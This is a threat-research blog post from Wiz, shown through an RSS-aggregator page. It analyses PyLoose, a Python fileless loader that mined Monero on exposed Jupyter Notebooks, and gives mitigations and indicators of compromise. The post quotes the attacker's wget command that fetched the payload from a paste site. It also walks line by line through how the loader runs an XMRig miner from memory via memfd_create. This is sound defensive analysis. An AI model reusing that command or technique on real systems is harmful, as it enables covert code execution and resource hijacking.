惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

爱范儿
爱范儿
aimingoo的专栏
aimingoo的专栏
Y
Y Combinator Blog
Vercel News
Vercel News
Blog — PlanetScale
Blog — PlanetScale
有赞技术团队
有赞技术团队
P
Proofpoint News Feed
WordPress大学
WordPress大学
V
V2EX
The Register - Security
The Register - Security
博客园 - 聂微东
酷 壳 – CoolShell
酷 壳 – CoolShell
博客园 - Franky
D
DataBreaches.Net
G
Google Developers Blog
O
OpenAI News
S
Schneier on Security
Simon Willison's Weblog
Simon Willison's Weblog
I
Intezer
Engineering at Meta
Engineering at Meta
Recorded Future
Recorded Future
T
Threatpost
The Hacker News
The Hacker News
Cisco Talos Blog
Cisco Talos Blog
D
Darknet – Hacking Tools, Hacker News & Cyber Security
B
Blog RSS Feed
Apple Machine Learning Research
Apple Machine Learning Research
T
The Exploit Database - CXSecurity.com
L
LINUX DO - 热门话题
G
GRAHAM CLULEY
博客园 - 叶小钗
V
Vulnerabilities – Threatpost
云风的 BLOG
云风的 BLOG
L
LINUX DO - 最新话题
MyScale Blog
MyScale Blog
L
LangChain Blog
Scott Helme
Scott Helme
大猫的无限游戏
大猫的无限游戏
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
雷峰网
雷峰网
Google Online Security Blog
Google Online Security Blog
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
N
News | PayPal Newsroom
NISL@THU
NISL@THU
M
MIT News - Artificial intelligence
Cloudbric
Cloudbric
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
The Cloudflare Blog
Recent Announcements
Recent Announcements

Wiz Blog | RSS feed

Meet Wiz for M365: Bringing SaaS into the Security Graph Bringing Security Visibility to Vercel with Wiz Axios NPM Distribution Compromised in Supply Chain Attack Tracking TeamPCP: Investigating Post-Compromise Attacks Seen in the Wild The Wiz Blue Agent, now Generally Available Beyond the Badge: What Achieving Microsoft’s Certified Software Designation Means for Your Cloud Security Introducing the Green Agent: AI-Powered Remediation for the Cloud Three’s a Crowd: TeamPCP trojanizes LiteLLM in Continuation of Campaign KICS GitHub Action Compromised: TeamPCP Strikes Again in Supply Chain Attack Introducing the Wiz Red Agent- AI-Powered Attacker Introducing Wiz AI Application Protection Platform (AI-APP) Introducing Wiz Agents & Workflows: Security at the Speed of AI AI Runtime Threat Detection: From Input to Real-World Impact Trivy Compromised: Everything You Need to Know about the Latest Supply Chain Attack It’s Official: Wiz Joins Google Understanding and Reducing AI Risk in Modern Applications Introducing Wiz Tenant Manager: Multi-Tenant Management for Federated Organizations The Agile FedRAMP Playbook, Part 4: Reactive Risk Management through Enriched Incident Response Wiz Achieves CPSTIC Certification in Spain Seeing AI Clearly: Building Visibility Across Modern AI Applications The Agile FedRAMP Playbook, Part 3: Preventative Risk Management by building Secure by Design Wiz Leads the 2026 Latio Application Security Report with awards in 4 categories Building an Agentic Cloud Security Ecosystem: A Reference Architecture with Wiz MCP and Infosys Cyber Next The Agile FedRAMP Playbook, Part 2: Proactive Risk Management with Continuous Monitoring Cloud-native Security for your Windows environment: Announcing the Wiz Runtime Sensor for Windows Would You Click ‘Accept’? Automatically detecting malicious Azure OAuth applications using LLMs Wiz Named a Leader in The Forrester Wave™: Cloud Native Application Protection Solutions, Q1 2026 From Detection to Remediation: It’s Time to Rethink AppSec Around Exploitability and Root Cause Fixes The Agile FedRAMP Playbook, Part 1: Why Risk is Your Best Starting Point Introducing AI Cyber Model Arena: A Real-World Benchmark for AI Agents in Cybersecurity Wiz + Spotify Backstage: Security at the Developer’s Desk Building AI Security Together: New Ways to Partner with Wiz for AI Security in 2026 Hacking Moltbook: The AI Social Network Any Human Can Control The Year in Wiz Research: 2025 Most Read Blogs WizExtend is Here: AI and Cloud Security Insights in Your Daily Workflow From Detection to Remediation: Wiz in Your JetBrains IDE Agentic Browser Security: 2025 Year-End Review CodeBreach: Infiltrating the AWS Console Supply Chain and Hijacking AWS GitHub Repositories via CodeBuild A 90-Day Action Plan to Turn Resolutions into Results with Wiz Introducing the Wiz Partner Alliance: A New Chapter for Partner Success Preparing for Post-Quantum Cryptography Wiz Recognized as a 2025 Customers’ Choice in the Gartner® Peer Insights™ Voice of the Customer for CNAPP Expanding the Zero Critical Club to set a new standard for AppSec and SecOps teams Snipping the Long Tail of Shai-Hulud 2.0 Protecting Against Zero-Day Vulnerabilities with SOC-Level ASM Alert MongoBleed (CVE-2025-14847) exploited in the wild: everything you need to know The Kenna Transition: Your Strategic Shift to Exposure Management From MCP to Vibe Coding: Full Endpoint Visibility in Wiz AI Security Bringing Oracle Cloud Identity to Wiz Zero‑Days in the Age of AI: Behind the Scenes of ZeroDay.cloud 2025, with a Record High of CVEs in Critical Cloud Infra Gogs 0-Day Exploited in the Wild Code to Cloud Attacks: From Github PAT to Cloud Control Plane Top AWS re:Invent Announcements for Security Teams in 2025 React2Shell: Technical Deep-Dive & In-the-Wild Exploitation of CVE-2025-55182 React2Shell (CVE-2025-55182): Everything You Need to Know About the Critical React Vulnerability Wiz Product Announcements at re:Invent 2025: Expanding Visibility from Code to Cloud Introducing Wiz SAST: Where Code Risk Meets Cloud Context Wiz Becomes Fastest Security ISV to Reach $1 Billion in AWS Marketplace Lifetime Sales It's Here! Wiz Exposure Management is Now GA Shai-Hulud 2.0 Aftermath: Trends, Victimology and Impact Service Catalog is Here: Expand Risk Visibility for Your Service and Its Dependencies, Simplify Issue Ownership WizOS: Powering Secured Image Adoption with AI 3 OAuth TTPs Seen This Month — and How to Detect Them with Entra ID Logs Mastering Software Governance with Hosted Technologies Inventory Shai-Hulud 2.0 Supply Chain Attack: 25K+ Repos Exposing Secrets Get Certified on Wiz Defend for Threat Detection and Response Blueprint for Security: A Guide to Code, Governance, and Response Frameworks Google Unified Security Recommended Program Names Wiz Among First 3 Strategic Partners Introducing Posture Issues: Transform Security Findings into Actionable Outcomes Empower and Accelerate Your SOC with the Blue Agent Exposure Report: 65% of Leading AI Companies Found with Verified Secret Leaks Wizdom 2025 Product Announcements: Extending the Cloud Operating Model When AI Becomes the Heart of Security: Powering a Future You Can Trust AI-Powered Wiz: From Agents to Everyday Intelligence Defend Agentless Workload Detection: Bringing Visibility to Blind Spots in Threat Detection Securing AI Agents with Wiz AI-SPM Introducing Wiz ASM: Context-Driven Attack Surface Management Securing Critical Infrastructure in the Cloud Era: A Policy and Technology Blueprint How CISOs Should Plan Security Budgets for 2026 Beyond the Checkbox: How Wiz Transforms SOC 2 into a Security Powerhouse Bringing Visibility to Kubernetes: Unified Inventory and Network Insight The Foundation Modern AppSec Is Still Missing: Code to Cloud, Rebuilt the Right Way Dismantling a Critical Supply Chain Risk in VSCode Extension Marketplaces Introducing HoneyBee: How We Automate Honeypot Deployment for Threat Research RediShell: Critical Remote Code Execution Vulnerability (CVE-2025-49844) in Redis, 10 CVSS score Defending against database ransomware attacks AI Security 101: Mapping the AI Attack Surface Introducing zeroday.cloud: First-of-its-kind cloud and AI hacking competition Unifying Cloud Risk and Network Defense: Wiz and Check Point The emerging use of malware invoking AI Wiz achieves FedRAMP High authorization Wiz + HCP Terraform: Close the IaC-to-Cloud Infrastructure Security Gap IMDS Abused: Hunting Rare Behaviors to Uncover Exploits Beyond CVEs: The Exploitation of Everyday Misconfigurations Wiz Research Discovers One in Five Organizations Exposed to Systemic Risks in Vibe-Coded Applications - Here's How to Secure Them Introducing Wiz Incident Response: Your Expert Partner for Cloud Security Incidents Shai-Hulud: Ongoing Package Supply Chain Worm Delivering Data-Stealing Malware DORA Compliance in the Cloud Era: Insights from Deloitte and Wiz How Wiz Customers like Brex and FICO See AI Changing Security Wiz Recognized as a Leader in the 2025 IDC MarketScape for ASPM
PyLoose: Python-based fileless malware targets cloud workloads to deliver cryptominer
Avigayil Mechtinger, Oren Ofer, Itamar Gilad · 2023-07-11 · via Wiz Blog | RSS feed

Using the Wiz Runtime Sensor, we have recently detected a new fileless attack targeting cloud workloads. The attack consists of Python code that loads an XMRig Miner directly into memory using memfd, a known Linux fileless technique. As far as we know, this is the first publicly documented Python-based fileless attack targeting cloud workloads in the wild, and our evidence shows close to 200 instances where this attack was used for cryptomining. We named the attack PyLoose based on the URL that hosted the Python loader (https://paste[.]c-net.org/chattingloosened).

Despite being a known technique, new fileless attacks targeting cloud workloads are rarely reported. In fact, the last activity was reported two and a half years ago by AT&T when TeamTNT leveraged Ezuri, an open-source tool written in Go, to load a fileless payload. Fileless attacks are evasive as they do not rely on writing payloads to disk. These attacks abuse operating system capabilities such as the Linux memfd RAM-based filesystem, making them challenging to detect with traditional security solutions.

In this blog post, we will detail the PyLoose attack and the Linux fileless technique that was used by the threat actor, discuss potential motivations for this type of attack, and lastly, provide steps for mitigating this attack chain.

PyLoose analysis

PyLoose is a fairly simple Python script that holds a compressed and encoded precompiled XMRig miner. It was first detected by Wiz’s Runtime Sensor on June 22th, 2023. On the same day, the script was uploaded to VirusTotal from Norway, possibly by the attacker or one of the victims. It has zero detections at the time of this report’s publishing.

VirusTotal detections for PyLoose (0/59)

Let’s go over the attack flow step by step.

Initial access

In this incident, the victim had a publicly accessible Jupyter Notebook service. Although the Notebook is designed to allow Python code execution, this specific service failed to restrict the execution of system commands, including via Python modules such as os and subprocess. Environments like these are often sought by threat actors since it is often easier to scan the internet for publicly exposed services than to invest heavily into attacking an unknown target.

Python script drop

The attacker downloaded the fileless payload from paste.c-net.org (a Pastebin-equivalent website) [T1102] into the Python runtime’s memory by making an HTTPS GET request in a way that avoids saving the file to the disk. Even though we observed the threat actor using the wget -O- https[://]paste[.]c-net.org/chattingloosened command in their initial attempts, our data suggests they switched to performing this request in Python for most of the attack volume. We believe this move was for the sake of simplicity rather than evasion or stealth.

Python script fileless execution

The script first decoded and decompressed the XMRig miner and then loaded it directly into memory via the memory file descriptor, memfd. The content of the Python script was only 9 lines long and featured the entire fileless payload compressed with zlib and encoded in base64.

Edited: The script was generated using the fileless-elf-exec open-source tool (thanks @Silas and vandycknick@infosec.exchange for the contribution).

PyLoose script snippet

Here’s a breakdown of the PyLoose script, line by line:

  1. Imports libraries for direct syscall invocation, os command execution, base64 operations, and zlib decompression.

  2. Loads the standard or default C library on the system.

  3. Uses the C library to get access to the syscall invocation function.

  4. Decodes the payload using the base64 algorithm [T1140].

  5. Decompresses the decoded content [T1027.002].

  6. Invokes syscall number 319 with arguments that match:
    memfd_create(name="", flags=MFD_CLOSEXEC)
    The returned argument from the syscall is the new file descriptor of the created memfd.

  7. Writes the content of the decoded and decompressed malware to the memfd buffer.

  8. Constructs a path to the memfd file descriptor.

  9. Invokes the malware directly from memory via the new memfd [T1620].
    The string smd is passed as its argv[0] and sole command-line argument, and an empty dictionary {} is passed as its environment variable, meaning no new environment variable will be passed.

In-memory XMRig execution

The in-memory file was quickly identified as an XMRig [T1496] with embedded config v6.19.3, which is quite recent as the latest available version is currently 6.20.0. The cryptominer connected to the remote IPv4 address 51.75.64[.]249 is associated with the MoneroOcean mining pool.

Why threat actors use fileless attacks

Fileless attacks are more evasive than attacks that rely on dropping a payload on the disk. This is because they are:

  1. Harder to detect – To effectively detect fileless malware in Linux, organizations need to deploy advanced security solutions that utilize runtime behavior-based analysis and memory monitoring techniques.

  2. Harder to investigate – Once detected, the fact that the payload “lives” in memory complicates the forensics process as the file must be dumped from memory while the resource is up and running. Therefore, the ephemeral nature of cloud workloads makes the investigation even harder.

  3. Less common – As mentioned above, documented cases of fileless attacks targeting cloud workloads are rare. As a result, security teams may put less effort into the detection of this type of attack.

What is memfd fileless execution

The memory file descriptor, memfd, is a Linux feature that allows the creation of anonymous memory-backed file objects that can be used for various purposes, such as inter-process communication or temporary storage. Threat actors sometimes abuse this Linux feature to execute payloads without writing them to disk, and thus avoid traditional security tools that rely on basic binary scans. Once the payload is placed within a memory section created via memfd, attackers can invoke one of the exec syscalls on that memory content, treating it as if it were a regular file on disk, and thereby launch a new process.

Live processes executed from memfd can be identified on an up-and-running workload by inspecting the symbolic link of /proc/{pid}/exe, which begins with the /memfd: prefix.

"ls -l /proc/{pid}/exe" output for a process executed via memfd

Attribution

The attacker went to great lengths to be untraceable by using an open data-sharing service to host the Python payload, adapting the fileless execution technique to Python, and compiling an XMRig miner to embed its config to avoid touching the disk or using a revealing command line.

All these steps suggest that the adversary has a level of sophistication not commonly observed in most publicly documented cloud workload attacks. Therefore, there are no strong indicators that can tie this attack to a specific threat actor.

How to prevent attacks like PyLoose

To make sure that your Jupyter Notebook service is not susceptible to this type of attack, consider taking the following precautionary steps:

  1. Avoid publicly exposing services like Jupyter Notebook as that can lead to code execution.

  2. Use a complex password/security token to access your service, or ideally, a centrally managed identity platform with MFA or other strong authentication methods.

  3. Constrain the execution of system commands and other unrestricted execution vectors.

How can Wiz help?

  1. Risk management – The Wiz agentless host configuration scanner detects misconfigured and publicly exposed Jupyter Notebook server instances, allowing you to pinpoint any instances in your environment that allow remote unauthenticated access from any IP address.

  2. Threat detection – The Wiz Runtime Sensor detects these types of fileless threats as the adversary moves through the attack chain, from the initial payload delivery (“Ingress tool was executed”​) and fileless payload (“Fileless execution was detected”) execution to the final intended cryptomining activities (“Connection to a known cryptomining pool”). The example alert below details a PyLoose fileless execution:

Wiz Runtime Sensor alert for fileless execution (including PyLoose), one of several alerts triggered by this campaign

Learn more about the Wiz runtime sensor.

Summary

In this blog post, we detailed a new Python-based fileless attack that delivers a precompiled XMRig miner on a publicly exposed Jupyter Notebook. Public documentation of fileless malware targeting cloud workloads is rare; the most recent new fileless attack that was documented was over two and a half years ago.  

These attacks serve as a reminder that organizations should have a security posture solution in place to help security teams eliminate toxic risk combinations, in addition to a runtime protection solution that quickly detects and responds to breaches.

We would be happy to collaborate with you on this research! Feel free to reach out anytime to Wiz Threat Research at threat.hunters@wiz.io.

Indications of compromise (IoCs)

DescriptionTypeValue
PyLoose loaderSHA-256 File Hash25232290fa9fa5529240a4e893ce206dfdcfc28d0b3a1b89389f7270f1046822
PyLoose loaderSHA-1 File Hashd422493b47e4798717f2b05a482c97ef9e6b74b9
PyLoose loaderMD-5 File Hashfec5b820594579f1088db47583d2c62d
XMRig payloadSHA-256 File Hash935ee206846223e6d2db3f62d05101c0bea741e7b43e1b73c1eb008f947d5ff1
XMRig payloadSHA-1 File Hasheba82ed21b329b0955ab87b2397a949628349b3f
XMRig payloadMD-5 File Hash059f83f8969b09c29c95b17452718ea3
Miner pool network endpointIPv4 Address + Port51.75.64.249 :20128
Cryptomining pool network endpointFQDN (DNS)gulf.moneroocean.stream
Cryptomining pool network endpointFQDN (DNS)pool.sabu-sabu.ml
Cryptomining pool network endpointFQDN (DNS)pool.xiao.my.id
Attacker’s Monero wallet addressWallet85DS3ShGZwtFffeQUrDK8Db12qwCcaCHofNcZdjMkjTCfWiRv9WLe4cR2W97eGnRXwBxDhTK7BbbE2Z7t4gjXRz1VLPmhn7

MITRE ATT&CK® Techniques used by PyLoose:

Command and Control – Ingress Tool Transfer (T1105)

Command and Control – Web Service (T1102)

Defense Evasion – Deobfuscate/Decode Files or Information (T1140)

Defense Evasion – Obfuscated Files or Information: Software Packing (T1027.002)

Defense Evasion – Reflective Code Loading (T1620)

Impact – Resource Hijacking (T1496)

See for yourself...

Learn what makes Wiz the platform to enable your cloud security operation